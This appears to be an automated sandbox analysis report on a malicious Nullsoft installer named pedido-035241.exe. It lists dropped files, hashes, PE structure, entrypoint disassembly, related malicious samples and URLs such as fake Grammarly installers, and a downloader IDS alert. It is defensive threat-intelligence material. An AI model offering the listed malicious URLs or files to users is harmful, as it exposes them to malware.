uu8v4UUzTU.exe | malicious | Unknown
uu8v4UUzTU.exe | malicious | Unknown
https://on-combine-data.s3.us-west-2.amazonaws.com/dealer-data/Share+Point/NTAS_MS3000X_Installer_v2.8.25_October2024_NO_UPS.exe | malicious | Unknown
https://veryfast.io | malicious | Unknown
SecuriteInfo.com.W32.PossibleThreat.20282.14864.exe | malicious | Unknown
SecuriteInfo.com.W32.PossibleThreat.20282.14864.exe | malicious | Unknown
GrammarlyInstaller.evxSw76fmxki94ued2mj0c82.exe | malicious | Unknown
GrammarlyInstaller.evxSw76fmxki94ued2mj0c82.exe | malicious | Unknown
https://viture.com/windows | malicious | Unknown
GrammarlyInstaller.cl87tH2fwify908jh75b0ag2.exe | malicious | Unknown
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 53158
Entropy (8bit): 5.062687652912555
Encrypted: false
SSDEEP: 1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5: 5D430F1344CE89737902AEC47C61C930
SHA1: 0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256: 395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512: DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious: false
Reputation: moderate, very likely benign file
Preview: PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                          Process:C:\Users\user\Desktop\pedido-035241.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):465
                                                                                                                                                                          Entropy (8bit):4.255544231677184
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:ZR1EOIygKJPTYEO/OAOLkKARrQdNJdKiXkB9MOyFCZ60WgE:9xIyPtYEO/vlK6QUlE
                                                                                                                                                                          MD5:2F8A39C6A08A57605F1965012760D560
                                                                                                                                                                          SHA1:4607DE528A646C0758D7FB322CF9CCFFAFA026B8
                                                                                                                                                                          SHA-256:37909462973046DA9CD15B9FB1CCD7F92D97C26AF08C83A8D486BA411DC69373
                                                                                                                                                                          SHA-512:0B2F239E494FCEE5D18812D98E3571F20B049CAF11CEA675CB55E95283A6E99E7A854DD87087EC5F7C402B7A7C760A1AB4B399EA17319C1F9249465E542E2D8D
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:pachydermateous bomuldsskjorterne redisseisin minimalists.delikatessehandlens standardfilnavn spillerelater,udstafferingers parallelforskydning ynglepladsernes libanons somatotypically inveigler sammenrendets..tyrannierne coeternally kommandrs colliquative gonidic ringetonen issens hyperanabolic unpicturesque..sminker apporterende campaigner gorvarehandlen radiosender bibelskes.logikfamilier neurotransmission pasfotoerne searchment inrighted couphgens toadfish,
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1093536
                                                                                                                                                                          Entropy (8bit):7.971789372050483
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24576:ENrNYo6GP6fzfqUC1tkth3VwV5k7j5awX300zQUGtZq:U+S6fziUC1wh3VwXgj5aEkHUGtZq
                                                                                                                                                                          MD5:68AD57514CFB4E1CB4529556DBBC9B73
                                                                                                                                                                          SHA1:3681D090C965CD8AF1C7BFFD6FE5427E997DAA41
                                                                                                                                                                          SHA-256:4B0C3D89A63DC1F177379EA05642C3C3B377ADC560B26C7A41AEBD2ED1AFE9AC
                                                                                                                                                                          SHA-512:F2EF34F8AD5282676BDC3913007D471CC59E1BF20C5371817B3C85A2C24C19983D3C6C2F5E00BB539FC6596A0B02B4A33E59A4391A4165C22E0CBF2EDD103F5A
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L....Oa.................f...*.......4............@.......................................@..........................................@...Y.............. ............................................................................................text....e.......f.................. ..`.rdata...............j..............@..@.data...8............~..............@....ndata...................................rsrc....Y...@...Z..................@..@................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:false
Preview:[ZoneTransfer]....ZoneId=0

Process:C:\Users\user\Desktop\pedido-035241.exe
File Type:data
Category:dropped
Size (bytes):2537825
Entropy (8bit):0.15731061171505112
Encrypted:false
SSDEEP:768:ZfmQIC91KjqGcnL63MV1HZDQDVlybvFG7dH9Sf12lqM1FBQWEP3dNaRrwPu1Br0O:Rrc
MD5:6462B1502F14E3329E79F164F0B8EDA9
SHA1:70F60B7634B75DAFA601D70E812D7127F4432AD3
SHA-256:50852368EB9E21692315077EB7DD5E833B4430342695CFF4E70FEF7DF59DCFB7
SHA-512:979F463C29EFDE5C746CE6A34B72DC064BDB9364702C5DB24B567E823B6992E076BDB160979330EDDDA03F9AE4EEB20FD1E656337A2654E43B3B36673820CF45
Malicious:false

Process:C:\Users\user\Desktop\pedido-035241.exe
File Type:data
Category:dropped
Size (bytes):5657071
Entropy (8bit):0.15928467329934035
Encrypted:false
SSDEEP:768:hia6UGQo5IgoTcs1teRMojkuNW52cfotYssiEfN5RJhDjTeYJNKUGQ0yyiJ+yDKJ:RLLXHTFL
MD5:7FD6A7B5493B8D6659842CBDAC26F759
SHA1:59ECA4FEF3F72F17B4F87C647836AF1EE0B7B208
SHA-256:F38655E8753CF872BBC92F703C0A23F3CB35EFEA183296B92ADF3672A509162C
SHA-512:C300E5599EB51D0862F806DF1C6274B0D59F75E41132F85C9E47F777CDD7B2E9B67C06BC033CD1FFE1C87A7EDD6B07D3E9DAD2D280EBAB1E22C7CA6291E881F5
Malicious:false

Process:C:\Users\user\Desktop\pedido-035241.exe
File Type:data
Category:dropped
Size (bytes):108656
Entropy (8bit):0.1629399370348107
Encrypted:false
SSDEEP:48:iM4xHhYyQjrwzEa24+rFK3q01Z2FdZe/Gbjd6Ne7GJ:duhYyQjcd++7KFdZKGAw
MD5:ABD3958B383B1C9F43AC4E47DD12BEC4
SHA1:4248CEAF77E8A46BBFA08FC14BDAB5428D7194F6
SHA-256:30E7E92C51752F6CFD747EC30BF29792A819FDA586557B053FF141861BC3EA7B
SHA-512:F6FE0761F4E15D9FCCCE230FCDFC77E95A259A014654FF94A600CBA120F222ED2085B6DC3CFEC7F21177137BD5136AC42894E113EAFD1D21659FF3F14316799B
Malicious:false

Process:C:\Users\user\Desktop\pedido-035241.exe
File Type:data
Category:dropped
Size (bytes):297493
Entropy (8bit):7.66304746887246
Encrypted:false
SSDEEP:6144:BNl6bDScMImLLF2H7D50y7+QL0vJ7xnne+c8/ZzAN:W7D50sN0/nneQhAN
MD5:AC443ED3BCDA8FD27EAB8E4719631588
SHA1:6E501A1D2959A2279C67FF2B635950B72C537DF8
SHA-256:050E2941ABCF6621568720F75C7D27B1BC7B57F4A2DB95DD44701AAB68996042
SHA-512:F4E6440CECEE0B5C2197E1F77757501B45CFA1FB14389944B3F775E5611ACCF946A1D6625E8758592636F26F05F41AED7309DE4B6CAE22CB1A3B8D18730DF69C
Malicious:false
Process: C:\Users\user\Desktop\pedido-035241.exe
File Type: data
Category: dropped
Size (bytes): 6429709
Entropy (8bit): 0.15806775405645646
Encrypted: false
SSDEEP: 768:VNOwnrRrLv7/6Ngd/3fk7lv70zCxVdw2J+bxTylmmf13Y2jmVnc+1dHiqkGAr/EA:vGD8vB
MD5: F4FF9F83B617854EAA4804F4499C7538
SHA1: C93182B840EBDDB4A16EF90F1B0AE26DC1562FBA
SHA-256: AFA03D58592E5BE1ADF5E352A40CE899BC707BB40CC6CD1EF5930E6302A94C18
SHA-512: 2E5C29BD767EEA4939A4B82CD7DD6EC323255D9046D96CE2C1931D617D125AB96ABC1F4B5444097A3A8085356FB7BD894A5C9769710B67823228BD1C371CF756
Malicious: false
Process: C:\Users\user\Desktop\pedido-035241.exe
File Type: data
Category: dropped
Size (bytes): 7637195
Entropy (8bit): 0.1584950093042192
Encrypted: false
SSDEEP: 768:DASGeKc+zkfELL9UhjwNNoVJ2zV7S9OrvkoAaqV6zoPv2WHiirTgQKUIZsrj6ZzL:gXK+k
MD5: EB71C6BE6D08F8A7C7C9DA1335DF04C1
SHA1: 7B57A40E3F6C44178A25EF465C3E7F5EA3184335
SHA-256: D1D5BFF683EDC3A076382FCFE8C8A28EA1FF6A1C7731A80BAB8FFF0E82A54D07
SHA-512: 5ED43E9E6A66F981DEEC765A13A361BCCEFE4E1A38C6847F9DB00F2ED1BF50497E36B6D5398190FB2CB0B191E4DA33A77C7378CDB446169941C84776D7406A48
Malicious: false
Process: C:\Users\user\Desktop\pedido-035241.exe
File Type: Unicode text, UTF-8 text, with very long lines (4255), with CRLF, LF line terminators
Category: dropped
Size (bytes): 71316
Entropy (8bit): 5.170339565453029
Encrypted: false
SSDEEP: 1536:5AWJySdBBOLUqUdlpBo5ZbTOAVAvF17f1XqkWU7UqmBEZELVunMzinv:Rp7eUMaAVAvFZf1XAU7UaEpMv
MD5: 5C166AC0DF5B33D27A3157FF3484B1D8
SHA1: 14F38AE3F4ED43AB6F47CAD5859E4494408092C5
SHA-256: C1203A1FC75A7592B8916F61C403CA3EEBED1B1D84CD3C7EAA89187EE665229C
SHA-512: 89A6E8A42AC4FC4B8618C3E79300126E49128C238E91F557A573EDD7905A8FB35CB601E422B0A55EE74CCBB274E228314CF27741E8B3B70B532D3980328E89B1
Malicious: true
Process: C:\Users\user\Desktop\pedido-035241.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 7168
Entropy (8bit): 5.298362543684714
Encrypted: false
SSDEEP: 96:J9zdzBzMDByZtr/HDQIUIq9m6v6vBckzu9wSBpLEgvElHlernNQaSGYuH2DQ:JykDr/HA5v6G2IElFernNQZGdHW
MD5: 675C4948E1EFC929EDCABFE67148EDDD
SHA1: F5BDD2C4329ED2732ECFE3423C3CC482606EB28E
SHA-256: 1076CA39C449ED1A968021B76EF31F22A5692DFAFEEA29460E8D970A63C59906
SHA-512: 61737021F86F54279D0A4E35DB0D0808E9A55D89784A31D597F2E4B65B7BBEEC99AA6C79D65258259130EEDA2E5B2820F4F1247777A3010F2DC53E30C612A683
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View (other analyses in which this dropped file was seen):
• Filename: uu8v4UUzTU.exe, Detection: malicious
• Filename: SecuriteInfo.com.W32.PossibleThreat.20282.14864.exe, Detection: malicious
• Filename: GrammarlyInstaller.evxSw76fmxki94ued2mj0c82.exe, Detection: malicious
• Filename: GrammarlyInstaller.cl87tH2fwify908jh75b0ag2.exe, Detection: malicious
File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.971789372050483
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: pedido-035241.exe
File size: 1'093'536 bytes
MD5: 68ad57514cfb4e1cb4529556dbbc9b73
SHA1: 3681d090c965cd8af1c7bffd6fe5427e997daa41
SHA256: 4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac
SHA512: f2ef34f8ad5282676bdc3913007d471cc59e1bf20c5371817b3c85a2c24c19983d3c6c2f5e00bb539fc6596a0b02b4a33e59a4391a4165c22e0cbf2edd103f5a
SSDEEP: 24576:ENrNYo6GP6fzfqUC1tkth3VwV5k7j5awX300zQUGtZq:U+S6fziUC1wh3VwXgj5aEkHUGtZq
TLSH: C0352305A2F2D873E1A64F77E53664F102ED6D22C131573F0312BF59BEB6262682D322
Icon Hash: 4e33695d030a3f39
Entrypoint: 0x4034f7
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x614F9AE5 [Sat Sep 25 21:55:49 2021 UTC]
TLS Callbacks: (none)
CLR (.Net) Version: (none)
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 56a78d55f3f7af51443e58e0ce2fb5f6
Signature Valid: false
Signature Issuer: CN=stivskrt, E=Oatenmeal@Proctorizes.Shr, O=stivskrt, L=Ruddington, OU="Welshed Imaginativeness ", S=England, C=GB
Signature Validation Error: A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number: -2146762487
Not Before / Not After:
• 17/06/2024 06:02:33 / 17/06/2025 06:02:33
Subject Chain:
• CN=stivskrt, E=Oatenmeal@Proctorizes.Shr, O=stivskrt, L=Ruddington, OU="Welshed Imaginativeness ", S=England, C=GB
Version: 3
Thumbprint MD5: 1686CA22A771496CECDFB312C0D27C52
Thumbprint SHA-1: E21A3845E81F6C435D6F565C89412C3DF95099FF
Thumbprint SHA-256: D98B842E22A158CE3E857D75245136394E465213FA5EB6BC37BD421E8B04313F
Serial: 2C6F4DE977A317E40EE4F92F6507FAC9DCA57440
Instruction (disassembly at entrypoint 0x4034f7):
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A2E0h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080CCh]
mov esi, dword ptr [004080D0h]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
                                                                                                                                                                          mov dword ptr [ebp-00000140h], 0000011Ch
                                                                                                                                                                          call esi
                                                                                                                                                                          test eax, eax
                                                                                                                                                                          jne 00007FD85CF54B9Ah
                                                                                                                                                                          lea eax, dword ptr [ebp-00000140h]
                                                                                                                                                                          mov dword ptr [ebp-00000140h], 00000114h
                                                                                                                                                                          push eax
                                                                                                                                                                          call esi
                                                                                                                                                                          mov ax, word ptr [ebp-0000012Ch]
                                                                                                                                                                          mov ecx, dword ptr [ebp-00000112h]
                                                                                                                                                                          sub ax, 00000053h
                                                                                                                                                                          add ecx, FFFFFFD0h
                                                                                                                                                                          neg ax
                                                                                                                                                                          sbb eax, eax
                                                                                                                                                                          mov byte ptr [ebp-26h], 00000004h
                                                                                                                                                                          not eax
                                                                                                                                                                          and eax, ecx
                                                                                                                                                                          mov word ptr [ebp-2Ch], ax
                                                                                                                                                                          cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                                                                                                                          jnc 00007FD85CF54B6Ah
                                                                                                                                                                          and word ptr [ebp-00000132h], 0000h
                                                                                                                                                                          mov eax, dword ptr [ebp-00000134h]
                                                                                                                                                                          movzx ecx, byte ptr [ebp-00000138h]
                                                                                                                                                                          mov dword ptr [0042A2D8h], eax
                                                                                                                                                                          xor eax, eax
                                                                                                                                                                          mov ah, byte ptr [ebp-0000013Ch]
                                                                                                                                                                          movzx eax, ax
                                                                                                                                                                          or eax, ecx
                                                                                                                                                                          xor ecx, ecx
                                                                                                                                                                          mov ch, byte ptr [ebp-2Ch]
                                                                                                                                                                          movzx ecx, cx
                                                                                                                                                                          shl eax, 10h
                                                                                                                                                                          or eax, ecx
Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x54000 | 0x159b8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x10a880 | 0x720 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6515 | 0x6600 | 26e66bea3b62728a217ae7bf343ebc1a | False | 0.6615349264705882 | data | 6.439707948554623 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x139a | 0x1400 | 691f0273dad50ec603f6fedf850b58ee | False | 0.45 | data | 5.145774564074664 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x20338 | 0x600 | 4b75405561a3fcc45b8fe27a6808f3b5 | False | 0.4993489583333333 | data | 4.013698650446401 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2b000 | 0x29000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x54000 | 0x159b8 | 0x15a00 | 99e35a8b4499e294dd3cd1daedb48858 | False | 0.8200754154624278 | data | 7.353353976387772 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x54418 | 0x9e8c | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9934217009953681
RT_ICON | 0x5e2a8 | 0x3344 | PNG image data, 256 x 256, 8-bit colormap, non-interlaced | English | United States | 0.9758457787259982
RT_ICON | 0x615f0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.41275933609958504
RT_ICON | 0x63b98 | 0x1743 | PNG image data, 256 x 256, 4-bit colormap, non-interlaced | English | United States | 0.9952980688497062
RT_ICON | 0x652e0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.4580206378986867
RT_ICON | 0x66388 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304 | English | United States | 0.5692963752665245
RT_ICON | 0x67230 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024 | English | United States | 0.6601985559566786
RT_ICON | 0x67ad8 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.5
RT_ICON | 0x68140 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256 | English | United States | 0.5238439306358381
RT_ICON | 0x686a8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6063829787234043
RT_ICON | 0x68b10 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.6747311827956989
RT_ICON | 0x68df8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.8074324324324325
RT_DIALOG | 0x68f20 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x69020 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x69140 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x69208 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x69268 | 0xae | data | English | United States | 0.632183908045977
RT_VERSION | 0x69318 | 0x274 | data | English | United States | 0.47611464968152867
RT_MANIFEST | 0x69590 | 0x423 | XML 1.0 document, ASCII text, with very long lines (1059), with no line terminators | English | United States | 0.5127478753541076
DLL | Import
ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-16T16:33:19.318083+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49778 | 172.217.19.174 | 443 | TCP
